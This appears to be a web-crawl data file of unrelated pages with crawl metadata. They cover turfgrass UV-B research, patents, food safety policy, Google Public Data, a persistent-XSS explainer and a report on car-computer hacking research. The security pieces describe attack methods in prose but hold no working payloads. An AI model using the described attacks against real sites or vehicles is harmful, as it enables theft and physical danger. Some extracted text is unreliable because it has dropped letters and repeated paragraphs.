Nangle E.J.,Chicago District Golf Association | Gardner D.S.,Dep. of Horticulture and Crop Science | Metzger J.D.,Dep. of Horticulture and Crop Science | Rodriguez-Saona L.,Dep. of Food Science and Technology | And 3 more authors. Agronomy Journal | Year: 2015 Pigments and phenolics that absorb ultraviolet light (UV) are involved in the protection of the photosynthetic apparatus during periods of high ultraviolet-B (UV-B) radiation and can be of benefit to turfgrasses. This study initiated in October 2010 and repeated in March 2011 aimed to characterize protective pigment responses to elevated UV-B in cool-season turfgrass. Tall fescue (Festuca arundinacea Schreb.), perennial ryegrass (Lolium perenne L.), and creeping bentgrass (Agrostis stolonifera L.) cultivars L93 and Penncross were tested. Turfgrass pigment responses were measured over a 1-wk period during which they were subjected to 16 kJ m-2 d-1 of UV-B in growth chambers. Photoperiod was 14 h and plants were subjected to 26.2 mol m-2 d-1 photosynthetically active radiation (PAR) at 20º C day and 17°C night. Turfgrass samples were collected at Day 0, 1, 3, 5, and 7. Measurements included chlorophyll uorescence, chlorophyll pigmentation, and avonoid, phenolic, anthocyanins, and carot-enoid concentrations. Chlorophyll uorescence increased and chlorophyll quantities decreased signi cantly (P < 0.05) in UV-B conditions compared to control. All species had signi cantly (P < 0.05) higher quantities of total phenolics and avonoids at the top of the tissue canopy relative to roots and shoot tissue near the soil surface. Anthocyanins were only found in creeping bentgrass L93. Carotenoids, zeaxanthin, and β-carotene declined in the UV-B treatment for both creeping bentgrass L-93 and Penncross a er 7 d, but did not decrease for perennial ryegrass or tall fescue. Carotenoids may play a greater role in UV-B tolerance than anthocyanins in cool-season turfgrasses due to their ubiquitous presence. © 2015 by the American Society of Agronomy, 5585 Guilford Road, Madison, WI 53711. All rights reserved. Source
<urn:uuid:7b83e5f7-6cb3-4208-937d-58f60b6136f6>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/dep-of-horticulture-and-crop-science-1231207/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00329-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933628
547
2.890625
3
There are a number of fun patents, and there is even a website for absurd patents. Patents are still very much in the news. I discussed a broad review of patents in my last column. This month, I will drill down a bit. I hope you went to Google Patents and downloaded one or more just to see what they look like. Only utility patents will be discussed here. Design patents are not usually obtained by engineers. A utility patent document usually has several distinct parts, some of which are legal requirements. The first page of the patent has a title section across the top with the first named inventor, patent number and date of issue. Next is the title of the patent, and then a complete listing of the named inventors and their residences, followed by an application number and the date of filing. The field of search is a listing of numerical categories the patent office uses to sort out different fields of invention. It’s just an indexing system where similar inventions might be found. A list of references provides sources of similar patents and publications that can be used to fill in the background and demonstrate what has previously been done. The patent office examiner and the representative of the inventors are identified. A brief abstract summarizes the invention. And a representative drawing appears on the first sheet. Next are the drawings made according to patent office rules. Two general types of drawings are functional block diagrams and flow charts. The elements of the drawings are numbered, and the text refers to the numbers when describing the drawings. The text of the patent is called the specification. It begins with a section called the background of the invention. This describes the general area of the invention and the problems in the prior art. These are the problems the new invention seeks to ameliorate or solve. A good invention will solve a “long-felt need” and will succeed where others have failed. The background section will broadly describe what “one of ordinary skill in the art” would be expected to know. This is important because you can’t describe everything that goes into the invention. You have to make some assumptions about what the reader will know and what sort of background knowledge he or she will have. Carl Sagan famously said: “If you wish to make an apple pie from scratch, you must first invent the universe.” This can’t apply here. The summary of the invention is just that. It’s a brief description of what has been invented and how it solves the problems with the prior art described in the background section. It often has several paragraphs that begin with: “It is an object of the invention to provide an apparatus and method to. …” The brief description of the drawings follows with just one sentence per drawing. There is very little detail in this listing. Next are two sections that do the heavy lifting: the detailed description of the preferred embodiments and the claims. You will recall from the discussion in the last column that a patent can be considered a deal between the inventor and society, wherein the inventor makes a complete disclosure of the invention and how to practice it in exchange for a limited period of exclusivity, during which the inventor has the right to preclude others from making, selling or using the invention. The inventor is not required to describe every possible way of practicing the invention, just at least one preferred way, called a preferred embodiment. More than one embodiment is better, but not all need be disclosed. The figures play an important role in this section. As mentioned earlier, each element of a drawing is numbered. Those numbers are called out in the specification, and the associated elements are described in detail, along with any interaction there might be with other elements. The preferred embodiment section usually ends with a statement that other variations and modifications that would occur to one of ordinary skill in the art are included as part of the invention. The claims are the heart of the patent. They define the scope of the invention. If a feature or function is not covered by a claim, it is not part of the invention, even if it is described in detail in the specification. The creation of claims is highly technical and should only be done by an experienced patent attorney or patent agent. Reading the claims of a patent will convince you of this. There are a number of fun patents. Patent number 6,733,362 covers a bra. Another example is 5,443,036, “A method of exercising a cat.” It’s a very short patent, only four pages, having only four claims and one drawing sheet. I have personally infringed that patent, since I used it. However, we are unlikely to ever know if it is a valid patent because no one will challenge it in court. That’s an expensive exercise, and there is no financial motivation to do that. There is even a website for absurd patents . Visit it and get a laugh or two. Patents are still very much in the news. I discussed a broad review of patents in my last column. This month, I will drill down a bit. I hope you went to Google Patents and downloaded one or more just to see what they look like. Only utility patents will be discussed.
<urn:uuid:c1e3625e-b720-40ca-afab-18ab5f6e2ab3>
CC-MAIN-2017-04
https://www.cedmagazine.com/print/articles/2012/11/cicioras-corner-patents-and-you
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00237-ip-10-171-10-70.ec2.internal.warc.gz
en
0.95377
1,069
2.53125
3
In recent years, the United States has seen an increasing incidence of food contamination. These incidents reflect a troubling trend that has seen the average number of outbreaks from contaminated produce and other foods grow to nearly 350 a year from 100 a year in the early 1990s, President Obama said Saturday in his weekly YouTube address. Obama cited several reasons for this in his address including outdated regulations, fewer inspectors, scaled back inspections of the nation's food supply and a lack of information sharing between the government agencies charged with that responsibility. "The FDA has been underfunded and understaffed in recent years leaving the agency with resources to inspect just 7,000 of our 150,000 of our food processing plants and warehouses each year," Obama said. That leaves 95 percent of America's food supply uninspected. "That is a hazard to public health," he said. That will change under the new leadership of the U.S. Food and Drug Administration, he said. In the radio address, he appointed Dr. Margaret Hamburg Commissioner of the Food and Drug Administration and Joshua Sharfstein deputy commissioner. Obama also announced the creation of a new Food Safety Working Group to address the steep rise in the incidence of contaminated food. The working group will bring together Cabinet secretaries and senior officials to advise the president on how to best upgrade food safety laws, foster coordination throughout the government and improve the enforcement of food safety laws. Obama directed the working group to report it's recommendations to him "as soon as possible." The U.S. Department of Agriculture is also changing a rule that allowed the sale of "downer cattle" into the food supply on a case by case basis. The rule requires cattle that become non-ambulatory disabled after passing ante-mortem inspection, be condemned and properly disposed of. Obama also announced a plan for a billion-dollar investment in modernizing food safety labs which will include "significantly increasing the number of food inspectors helping ensure that the FDA has the staff and support they need to protect the food we eat," he said. "In the end, food safety is something I take seriously, not just as your president but as a parent," Obama said. "No parent should have to worry that their child is going to get sick from their lunch just as no family should have to worry that the medicines they buy will cause them harm."
<urn:uuid:6e880696-dc0b-42ae-83de-aa8c9de3975d>
CC-MAIN-2017-04
http://www.govtech.com/health/99356294.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00449-ip-10-171-10-70.ec2.internal.warc.gz
en
0.977481
475
2.734375
3
Google this week piloted a new feature that, according to the company, "makes it easy to find and compare public data," but, in reality, Google itself can't find a lot of the public data out there. Many federal Web sites or content on site pages cannot be indexed by typical search engines, including Google. So, much of the data on these sites is invisible, or hidden in the so-called "Deep Web." Part of the reason is that government pages include databases, forms and other coding that search engines cannot crawl through. Many are also lacking site maps, or a visual breakdown of the pages of a Web site, that help search engines capture all of a site's pages. Google's new tool, Google Public Data, only works with public data that is already accessible to search engines. The company created the application because federal data "was complicated not because it was inaccessible," Google spokeswoman Aviva Gilbert said. It takes easy-to-crawl -- but otherwise opaque -- information and makes it easy to understand. Google grabs unemployment rates and population data accessible through the sites of the U.S. Bureau of Labor Statistics and the U.S. Census Bureau's Population Division and displays the information in interactive graphs that the user can manipulate. "When comparing Santa Clara county data to the national unemployment rate, it becomes clear not only that Santa Clara's peak during 2002-2003 was really dramatic, but also that the recent increase is a bit more drastic than the national rate," states a Google release, explaining what can be concluded based on the visualization. A standard Google search for unemployment data in Santa Clara county would lead the user to a list of various public and private links -- "but it was difficult to navigate," Gilbert said. The new tool does not make online federal data more accessible, but rather more meaningful. Google researchers "haven't figured out how to site map everything," said Jerry Brito, who studies government transparency as a senior research fellow at George Mason University's Mercatus Center. "It's kind of impossible to do that without the government agencies cooperation." He and Google have advocated that Congress require agencies to make all of the information on their sites accessible to commercial search engines. A law introduced last Congress by Sen. Joseph I. Lieberman, I-Conn., chairman of the Homeland Security and Governmental Affairs Committee, directs the government to "promulgate guidance and best practices to ensure that publicly available online federal government information and services are made more accessible to external search capabilities, including commercial and governmental search capabilities."
<urn:uuid:81333c92-c962-4e8d-bd18-ea1a0af6789a>
CC-MAIN-2017-04
http://www.nextgov.com/technology-news/tech-insider/2009/04/for-google-public-not-always-public/52433/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00449-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938291
520
2.578125
3
Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application. XSS vulnerabilities are the most common type of input validation vulnerabilities, according to Context Information Security report “Web application vulnerability statistics 2013”. The Persistent XSS condition is met when a website or web application stores user input, serves it back to other users when retrieving it at a later stage without validation before storage or before embedding stored content into HTML response pages. Hence, malicious code is inputted by attackers into vulnerable web pages and is then stored on the web server for later use. The payload may be served back to other users browsing web pages and is executed in their context, at a later stage. Thus, the victims do not need to click on a malicious link in order to run the payload (as in the case of Non-Persistent XSS); they simply have to visit the vulnerable web page, serving back un-sanitized user input from other web sessions. Persistent XSS is less frequent than Non-Persistent XSS, as the vulnerabilities which make it possible are less common and more difficult to find. On the other hand, the damage that Persistent XSS can do is more devastating than the damage done by Non-Persistent XSS – because once the payload is stored, it has the potential of infecting most of the visitors of the vulnerable web page. Persistent XSS is also referred to as Type 2 XSS because the attack is carried out via two requests: one for injecting malicious code and having it stored on the web server, and the other for when victims load HTML pages containing the payload. Description of Persistent / Stored Cross-site Scripting As is with most web-based attacks, exploiting Stored XSS vulnerabilities requires some research. Usually attackers search vulnerable websites that can be used to carry out an attack. There are some types of websites which are prone to such vulnerabilities because they allow content sharing between users, and consequently they constitute the starting points of research in this respect: - Forums / message boards - Blogging websites - Social networks - Web-based collaboration tools - Web-based CRM/ERP systems - Web-based email server consoles and web-based email clients Once a website is identified as being potentially vulnerable, attackers will try to inject script code into data that is going to be stored on the server. Then, they will access the web pages that are serving back the content they have posted and test if the script executes. The malicious code itself is usually delivered manually by the attacker in input fields on the vulnerable web pages, but there are cases where attackers build tools that regularly inject scripts automatically. Unlike Non-Persistent XSS, Persistent XSS does not require a social engineering phase, as victims of this attack do not need to be lured into clicking on a crafted link. However when exploiting Persistent XSS vulnerabilities, attackers will try to get more and more victims to visit the vulnerable web page so they will most probably still send SPAM messages or promote it on social networking websites. Examples of Stored XSS Forums / message boards Once a forum is identified as vulnerable, attackers may open a new topic and insert malicious scripts in the topic title or body. They can also tag the topic using popular keywords so that the topic is a popular search result. The content of the forum post will be stored by the server. When the victims browse topics or search for certain keywords, they may reach the infected topic. When the topic loads, its contents will be sent to the victim’s browser and the payload may be executed. Alternatively, attackers may build tools that automatically post malicious scripts in replies on popular / sticky topics, send private messages containing the payload to forum members, etc. The consequences are vast, because the attack enables execution of arbitrary code, usually with elevated privileges – most home users still use the default “administrator” account and although latest Windows operating systems come with user access control and hardened browser policies, they are usually disabled in order to improve on the user experience. Typical goals of Persistent XSS attacks: - Cookie theft - Data theft Defending Against Persistent / Stored XSS The best way to prevent Persistent XSS is to make sure that all user input is properly sanitized before it gets stored permanently on the web server, and as a second line of defense, make sure that the static content presented to users is also sanitized. As malicious scripts can be encoded in various ways, sanitization parsers should take encoding into consideration, as well as various ways to inject code, when searching for payloads in the content to be stored / served back. Web applications can be kept XSS-free by conducting assessment tests on a regular basis using a web vulnerability scanner that detects cross-site scripting vulnerabilities while providing you with details on how to fix them.
<urn:uuid:b0e9c5cc-af5b-4903-a1be-d85840e15456>
CC-MAIN-2017-04
http://www.acunetix.com/blog/articles/persistent-cross-site-scripting/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00081-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914511
1,063
3.015625
3
Two security researchers at Defcon on Friday revealed the methods they used to hack into car computers and take over the steering, acceleration, breaks and other important functions. Charlie Miller, a security engineer at Twitter, and Chris Valasek, director of security intelligence at IOActive, spent 10 months researching how they could hack into the network of embedded computer systems called electronic control units (ECUs) used in modern cars and see what they could do once they gained access to it. Their test cars were a 2010 Ford Escape and a 2010 Toyota Prius. Some of the things they were able to achieve by hooking a laptop to the ECU communications network and injecting rogue signals into it included disabling the breaks while the car was in motion, jerking the steering wheel, accelerating, killing the engine, yanking the seat belt, displaying bogus speedometer and fuel gauge readings, turning on and off the car's lights, and blasting the horn. The researchers also found a way to achieve persistent attacks by modifying the ECU firmware to send rogue signals even when they were no longer physically connected to the control units. A research paper explaining how the hacking was done was shared with Ford and Toyota a few weeks before the Defcon presentation, the researchers said. Toyota responded that it didn't consider this to be car hacking and that the company's security efforts are focused on preventing remote attacks from outside the car, not those that involve physically accessing the control system, Miller and Valasek said. The goal of the research was to see what could be done when hackers gain access to the ECU network, known as the controller area network bus, the researchers said. It doesn't matter if it's done locally or remotely; access to a single ECU provides access to the whole network and gives the ability to inject commands, they said. Miller is certain that other researchers will find ways to remotely attack the systems in the future. The software industry hasn't figured out how to write secure software yet, so there's no reason to believe car makers have figured it out either, he said. The code in systems that can be accessed remotely -- telematics units, tire sensors, those using Bluetooth and Wi-Fi -- might have a lot of vulnerabilities, he said. "I'm sure that if people start looking, they would will start finding vulnerabilities." That's part of the reason Miller and Valasek decided to make the details of their research public, including what kind of equipment, cables and software they used. The full research paper and the custom software tools that were written to interact with the ECUs, as well as the code used to inject particular commands, will be released this weekend, Miller said. "We want other researchers to keep working on this; on other cars or on the same cars," Miller said. "It took us ten months to do this project, but if we had the tools that we have now, we would have done it in two months. We want to make it easy for everyone else to get involved in this kind of research." Concerns that the tools could enable people to hack car systems for malicious purposes are valid, the researcher said. However, if it's that easy to do, then they could do it anyway; it would just take them a bit more time, he said. "If the only thing that keeps our cars safe is that no one bothers to do this kind of research, then they're not really secure," Miller said. "I think it's better to lay it all out, find the problems and start talking about them." However, fixing the issues won't be easy because most of them are there by design, according to Miller. Car manufacturers won't be able to just issue a patch, the researcher said. "They'll have to change the way these systems are made." Right now, there's no authentication when car computers communicate with each other, because they need to react and send signals quickly in potentially dangerous situations, the researcher said. Adding authentication will introduce latency, so the systems will need faster processors to make up for that. Those processors would cost more, so car prices would rise, he said. "We had not seen the research in advance, but learned about it through media coverage," Cindy Knight, public affairs manager at Toyota Motor Sales, said on Saturday via email. "At Toyota, we take seriously any form of tampering with our electronic control systems," she said. "We strive to ensure that our electronic control systems are robust and secure and we will continue to rigorously test and improve them." "It is important to note that this recently publicized demonstration required a physical presence inside the vehicle, extensive disassembly of the instrument panel, and a hard-wired connection," Knight said. "All of this would be very obvious to the driver." Ford Motor Co. in the U.S. did not immediately respond to a request for comments.
<urn:uuid:7775c4ae-39f4-4c54-9d41-0b7549ff5236>
CC-MAIN-2017-04
http://www.networkworld.com/article/2168750/access-control/researchers-reveal-methods-behind-car-hack-at-defcon.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00081-ip-10-171-10-70.ec2.internal.warc.gz
en
0.975666
1,008
2.59375
3
By Alex Lesser, Vice President, Cloud/Data Infrastructure Group at PSSC Labs What is a cloud? Obviously it is group of small water particles we see in the Earth’s atmosphere. But when combined with the word “computing” a cloud takes on a life of its own. The best definition of cloud that I have heard is that it is simply “the easy button”. I’m certain many meeting questions are answered with a simple, “We’ll just use the cloud.” While this may be a naïve notion, I can’t agree more. And in today’s complex world who can blame us for wanting to find the simple answer to everything? But is the answer really that simple? Let’s set the way back time machine to the late 80’s and early 90’s, a revolutionary technology offered us the ability to find the answer to everything. This technology was famously coined “the Internet.” Suddenly we had the ability to instantaneously access information from anywhere in the world. The name was exotic at first, but in computer time an antiquated phrase at just 20 years old. We are a next generation society. We have next generation cell phones, next generation advertising, next generation genome sequencing and of course, next generation Internet. To a great degree cloud computing is simply the evolution of the Internet. Fortunately the answer to cloud computing does not end there. I believe a deeper understanding can help to explain how we are developing tools to store, manipulate and track ever-increasing amounts of data. At it’s core, cloud computing is a remote computing environment which includes processors, storage, memory, operating system, applications and a network connection which allows people to access those resources. My organization PSSC Labs has been delivering cloud computing systems for over a decade, well before the term cloud computing came about. We refer to our systems as “Computer Clusters”. We delivered our 1000th PowerWulf Computer Cluster in 2009. Many people may not immediately recognize our systems as cloud computers. They are not massive systems filling an entire 25,000 square foot warehouse. Most of the organizations using these systems are not publicly traded. Our Computer Clusters are designed and custom-configured to meet the needs of specific computing goals. Public & Private Clouds As the term continues to evolve, cloud computers will further delineate to be either “Public” or “Private”. Public clouds are just that–public. This means that any organization has the ability to access the available computing resource. Many companies, large and small, are creating and marketing public clouds. One important note just because the cloud is public does not necessarily mean that it is free to use. In fact, most public clouds require users to pay subscription fees. My organization uses one of the more commonly recognized Public Cloud Computing companies Salesforce.com. Salesforce.com offers us the computing resources to manage, monitor and update our growing sales team. We pay a monthly fee to access Salesforce.com, upload information, and track data. Salesforce.com is outside of our organization and therefore is part of the Public network. However, the information that I upload to Salesforce.com however is private, and hopefully remains private. Private clouds, on the other hand, reside within an organization’s firewall and are not accessible by anyone who has not been granted access. This is the far more common Cloud Computer. Many companies have invested heavily in their in-house computing resources. These computing resources are accessible only by individuals within the company. The private clouds greatly outnumber public clouds. Most organizations consider sensitive data critical to their business. Letting any intellectual property outside the company firewall is a risk most companies have not taken. A line is being drawn in the sand–will public clouds eventually replace private clouds? For me, this argument is non-essential. Instead, we should focus on the fact that computing resource needs are growing, and fast. In less than 10 years we have seen the birth of several massive computing facilities, each of which would fill a football stadium. Data is being generated at petabytes per second. We need to find a smarter, more efficient way of creating sustainable, high performance cloud computing infrastructures. We are working to deliver compute and storage solutions for any size public and private clouds.
<urn:uuid:3ff7f131-2a57-480f-8f1c-059c258c60e1>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/04/05/cloud_surfing_made_simple/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00569-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949679
902
2.640625
3
One of the services that you can discover in Unix environments is the rlogin.This service runs on port 513 and it allows users to login to the host remotely.This service was mostly used in the old days for remote administration but now because of security issues this service has been replaced by the slogin and the ssh.However if you find a system that is not properly configured and is using this service then you should try to exploit it. Lets say that you discover the following system which the rlogin is running on port 513. Now the next step is to check whether the rsh-client is installed in our system.If not then we have to type the command apt-get install rsh-client.The rsh-client is a remote login utility that it will allow users to connect to remote machines. The last step is to use the command rlogin -l root IP.This command will try to login to the remote host by using the login name root.As we can see from the next image we have successfully logged in remotely without asking us for any authentication as a root user.Of course if we know that there are other usernames on the remote host we can try them as well. The reason that we were able to connect remotely without any authentication is because that the rlogin as a service is insecure by design and it can potentially allow anyone to login without providing a password.However it is very difficult in nowadays to find a system with that service running but it will worth the try if you discover it to try to exploit it.
<urn:uuid:cf8aec39-7a76-4b17-b74b-792d045b745f>
CC-MAIN-2017-04
https://pentestlab.blog/2012/07/20/rlogin-service-exploitation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00385-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960064
320
2.890625
3
Idaho National Laboratory (INL) continues its development of an advanced software framework for simulating the behavior of complex systems, called MOOSE. Work on MOOSE, which stands for Multiphysics Object-Oriented Simulation Environment, began in 2008. The development team started with computer code and numerical libraries from existing, proven “massively scaling numerical tools” and kept enhancing this new framework, which now boasts high-level features, including a “hybrid parallel mode” and “mesh adaptivity.” |Jason Miller, part of the team that developed MOOSE, runs the MARMOT code, which models microscopic changes in nuclear fuel during irradiation. Source.| The MOOSE development team is working to make simulation more accessible by making it easier to create simulation capabilities for complex mathematical models in fields like nuclear science, physics and chemistry. MOOSE opens up the advantages of simulation to all these domain experts – so they can advance their science without also having to become computer scientists. “People were doing these simulations before, but they had to develop the entire code,” said Derek Gaston, the computational mathematician leading INL’s Computational Frameworks Group. “Something that would take 5 years with a team of 10 people can now be done in 1 year with three people.” MOOSE’s biggest success has been in the field of nuclear energy research. For nuclear engineers studying irradiation’s complex effect on materials and reactor components, mathematical models and computer simulations are enormously helpful. Irradiation experiments are expensive and time-consuming, requiring multiple steps that can add up to years before a result is achieved. Modeling and simulation help steer the research in the right direction and allow the scientists to design a better, i.e., more focused, experiment. Although the computational assist is advantageous it is not without challenges. As this article from Idaho National Laboratory explains: “Building simulations is a time-consuming task requiring an entire team of people with detailed understanding of everything from parallel code development to the physics of the system under study. Most scientists are not programmers (and vice versa), so tackling simulation often proved too daunting.” This is where MOOSE comes in. According to the INL piece, “MOOSE carries much of the programming burden, making simulation tools more accessible for a wide array of researchers.” MOOSE was designed to be a general problem solver, capable of accommodating multiple mathematical models. Its plug-and-play design lets researchers enter the information that describes their system and MOOSE does the rest. That’s the beauty of MOOSE, according to Steve Hayes, an INL nuclear engineer who leads irradiation testing and post-irradiation examination (PIE) for the U.S. Department of Energy’s Fuel Cycle R&D program. “The user needs to know the governing equations for his or her field, and MOOSE solves them for you, meaning the scientist can focus on the science,” says Hayes. In keeping with the theme of increased accessibility, MOOSE runs on personal workstations, so researchers can carry out powerful simulations without a supercomputer. “MOOSE has revolutionized predictive modeling,” according to an article at INL, “especially in the field of nuclear engineering – allowing nuclear fuels and materials scientists to develop numerous applications that predict the behavior of fuels and materials under operating and accident conditions.” The simplicity of MOOSE has led to an entire ecosystem of tools, including applications for nuclear physics (BISON, MARMOT), geology (FALCON), chemistry (RAT) and engineering (RAVEN, Pronghorn).
<urn:uuid:5e89b065-34c8-4516-ac14-bab35aa00c89>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/09/11/moose_enables_plug_and_play_simulations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00385-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940948
768
2.90625
3
Nasa and Cisco are partnering to develop a climate change monitoring platform. The online collaborative global monitoring platform, called the "Planetary Skin", will capture, collect, analyse and report data on environmental conditions around the world. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Under the terms of a Space Act Agreement, Nasa and Cisco will work together to develop the Planetary Skin as an online collaborative platform, to capture and analyse data from satellite, airborne, sea- and land-based sensors. This data will be made available for the general public, governments and businesses to measure, report and verify environmental data in near-real-time, to help detect and adapt to global climate change. "In the past 50 years, Nasa's expertise has been applied to solving humanity's challenges, including playing a part in discovering global climate change," said S Pete Worden, director of Nasa's Ames Research Center. "The Nasa-Cisco partnership brings together two world-class organisations that are well equipped with the technologies and skills to develop and prototype the Planetary Skin infrastructure." Cisco and Nasa will kick off Planetary Skin with a series of pilot projects, including "Rainforest Skin," which will be prototyped during the next year. Rainforest Skin will focus on the deforestation of rainforests around the world and explore how to integrate a comprehensive sensor network. It will also examine how to capture, analyse and present information about the changes in the amount of carbon in rainforests in a transparent and useable way. According to scientists, the destruction of rainforests causes more carbon to be added to the atmosphere and remain there. That contributes significantly to global warming. "Mitigating the impacts of climate change is critical to the world's economic and social stability," said John Chambers, Cisco chief executive. "This unique partnership taps the power and innovation of the market and harnesses it for the public good. "Cisco is proud to work with Nasa on this initiative and hopes others from the public, private and not-for-profit sectors will join us in this exciting endeavour."
<urn:uuid:ec5104a4-109f-4ef2-a866-ddf9d0334930>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240088646/Nasa-and-Cisco-build-climate-change-reporting-platform
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00293-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944681
440
2.96875
3
Originally published November 15, 2011 When Confucius was asked what he would do first if he were in power, he responded: “Cleanse the definitions of terms we use!” According to Confucius, nothing is so destructive for peace, justice and prosperity as confusing names and definitions. To illustrate the question of what is real and what is not, Plato tells a story about a cave. In the middle of a cave, a number of prisoners sit against a small wall, chained there since childhood. They face one of the walls of the cave. Behind them there is a huge campfire that they cannot see. People walk between the campfire and the prisoners. All the prisoners can see is the shadows of these people on the cave’s wall in front of them. And because of the echo within the cave, even the sounds the people make seem to come from the direction of the shadows. To the prisoners, these shadows are the real world. Now let’s assume, Plato continues, that one prisoner is released from his chains, gets up and walks around. At first, he will not recognize anything in this new reality, but after time he would adapt. He would understand more about the new world, and perhaps even understand how people walking alongside a campfire cast shadows on the wall. What would happen if he returned to the other prisoners and told them what he has learned? They would ignore him, ridicule him, and if not for their chains, probably kill him. What Plato is trying to tell us is that a philosopher is like a prisoner freed from the cave, trying to understand reality. On a deeper level, Plato explains that the words we have for things refer to concepts in our mind; in other words, the shadows. We perceive reality through these concepts. Plato’s Cave is an old story, but still told in many variations. For instance, Plato’s Cave provides the philosophical basis for the film The Matrix, in which Morpheus explains to Neo: “How do you define real? If you're talking about what you can feel, what you can smell, what you can taste and see, then real is simply electrical signals interpreted by your brain.” Plato’s Cave showed that what was reality to the prisoners was nothing but a shadow, covering the “true reality.” For centuries, philosophers have tried to break free of their chains and find the truth. The Enlightenment philosophers believed the world was a large “machine”, and it was man’s purpose to uncover the laws of nature through reason and understand how the world turns. Immanuel Kant spoke of the Categorical Imperative in his search of universal principles to decide what’s right and wrong. Throughout the Middle Ages, truth was a religious principle. Plato believed that everything we saw was just a reflection of an underlying concept, which Kant later called the thing as such (Ding an sich). Every tree is an example of the concept of treeness, every person an example of humanity, every chair an example of chairness. But the postmodernists try to break away from the idea of truth. In their view, there can only be perception. Everything we perceive comes to us through our senses. What we see, what we feel, what we hear, and so forth. Perceptions can be communicated and shared, but this only means that reality is a social construct and can change anytime. Because perceptions are shared through language, truth and reality are culturally dependent. Think of the legend that Eskimos have nine different words for snow, or that doctors, accountants, lawyers and IT specialists have rich jargons to describe their truths and realities in much more detailed terms than those in other professions. Philosophers that shaped postmodernism include Søren Kierkegaard, Friedrich Nietzsche and Martin Heidegger. Although postmodernism has its critics as well, it is the dominant way of thinking today. If we look through the postmodern lens, what more would Plato’s cave reveal? Let’s expand Plato’s thought experiment. To my knowledge, Plato never said the prisoners were not able or not allowed to talk. Let them talk, and have them describe what they see. The prisoners sitting on the ends of the row may describe the shadows close to them as very long, while the prisoners in the middle would characterize them as short. The cave is warm to those sitting close to the fire, but cold to those sitting farther away from it. Each would tell a different story. And, just for the sake of argument, let’s bring in time travel and introduce a video camera into ancient Greece. We’ll allow all prisoners to record their view of reality and share those recordings. Whose recording is true? They are all true.1 If they are smart enough, they will detect a pattern if they each describe their reality from left to right. In fact, let’s take the experiment one step further, and allow the prisoners to turn around. They can see the fire and all the people moving through the cave, but are still chained to the wall. They would still each describe a slightly different view on reality. In short, postmodernists wouldn’t describe truth in terms of the shadow on the wall, and their underlying reality, they would describe it in relative terms; i.e., relative toward other perceivers regardless of whether they are looking at the shadows or the real people. In other words, truth is not in the objects we examine, not in the things as such, but in the eye of the beholder. Although we live in the postmodern world, IT professionals (and many other business professionals as well) are firmly entrenched in classic times. In the tradition of Plato and Kant, there must be a universal underlying truth to things, and all we have to do is apply reason to uncover it. Sure, it may change over time, but hopefully only to move even closer to the “true truth.” It is in the field of information management that this classic attitude is most visible. Professionals concerned with defining key performance indicators, putting together organizational taxonomies and building data warehouses have been looking for a single version of the truth since the advent of the information management discipline. It seems that most organizations have fundamental alignment issues in defining the terminology they use. In fact, I have formulated a “law” that describes the gravity of the problem: The more a term is connected to the core of the business, the more numerous are its definitions. There might be ten or more definitions of what constitutes revenue in a sales organization, what a flight means to an airline or how to define a customer for a mobile telephone provider. Few have been successful in reaching one version of the truth. Business managers have fiercely resisted. Machiavelli might have pointed toward political motives of business managers since a single version of the truth would limit their flexibility to choose the version of the truth that fits their story best. However, IT professionals say business managers should see that the benefits of satisfying their own goals are less important than the satisfaction of contributing to the success of the overall organization. In fact, ignoring less important needs for the benefit of higher pleasures is a hallmark of human civilization. So much for civilization if we can’t even achieve this in the workplace. Are IT specialists fighting windmills like Don Quixote? As I’ve discussed, the philosophers disagree whether there is a single objective truth or not.2 Postmodernists go only as far as to suppose joint observations, but others come to the aid of the classical IT professional. The American philosophical school of pragmatism states that we can call a statement true when it does all the jobs required of it. It fits all the known facts; matches with other well-tested theories, experiences and laws; withstands criticism; suggests useful insights and provides accurate predictions. If this is all the case, what stops us from calling it "true"? But let’s stick to postmodernism for a while. To explain the failure of reaching a single version of the truth, postmodernists would point to the IT professionals themselves – they are simply misguided. There actually is a very elegant and simple solution for the "one version of the truth" problem. “What is it?” I can hear you ask. I'll share that with you in my next article. Recent articles by Frank Buytendijk
<urn:uuid:1b41102d-75d9-45a0-8c55-c04895adcd03>
CC-MAIN-2017-04
http://www.b-eye-network.com/view/15680
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00017-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963753
1,746
2.953125
3
